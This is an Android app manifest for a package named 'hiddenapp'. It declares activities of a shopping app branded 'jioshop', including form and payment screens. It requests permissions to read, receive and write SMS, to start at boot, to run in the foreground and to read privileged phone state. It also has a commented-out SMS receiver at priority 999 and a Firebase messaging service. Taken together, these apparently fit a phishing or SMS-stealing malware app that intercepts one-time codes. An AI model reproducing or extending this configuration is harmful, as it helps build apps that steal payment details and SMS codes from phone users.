<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.example.hiddenapp"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"
        tools:ignore="ProtectedPermissions" />
    <application
        android:name="com.example.hiddenapp.RingAlarm"
        android:allowBackup="true"
        android:icon="@drawable/ic_log"
        android:label="@string/app_name"
        android:theme="@style/AppTheme"
        android:requestLegacyExternalStorage="true"
        android:hardwareAccelerated="true">
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name"
            android:enabled="true"
            android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <activity android:name="com.mijio.jioshop.SearchSuccessActivity"/>
        <activity android:name="com.mijio.jioshop.SearchResultActivity" />
        <activity android:name="com.mijio.jioshop.SearchActivity" />
        <activity android:name="com.mijio.jioshop.FinalActivity"></activity>
        <activity android:name="com.mijio.jioshop.PaymentActivity" />
        <activity android:name="com.mijio.jioshop.FormActivity" />
        <activity android:name="com.mijio.jioshop.MyCartActivity" />
        <activity android:name="com.mijio.jioshop.LandingActivity"/>
        <service android:name=".SMSBroadcastReceiver"/>

        <!--receiver android:name=".SMSBroadcastReceiver" android:exported="true" android:enabled="true"
            android:process=":remote">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"></action>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver-->
        <meta-data android:name="com.google.firebase.messaging.default_notification_channel_id"
            android:value="hai"/>
        <service
            android:name=".MyFirebaseMessagingService"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT" />
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT"/>
            </intent-filter>
        </service>
        <!--service android:name=".Communicator"/-->



        <!--service
            android:name=".Jobscheduler"
            android:permission="android.permission.BIND_JOB_SERVICE" /-->
    </application>

</manifest>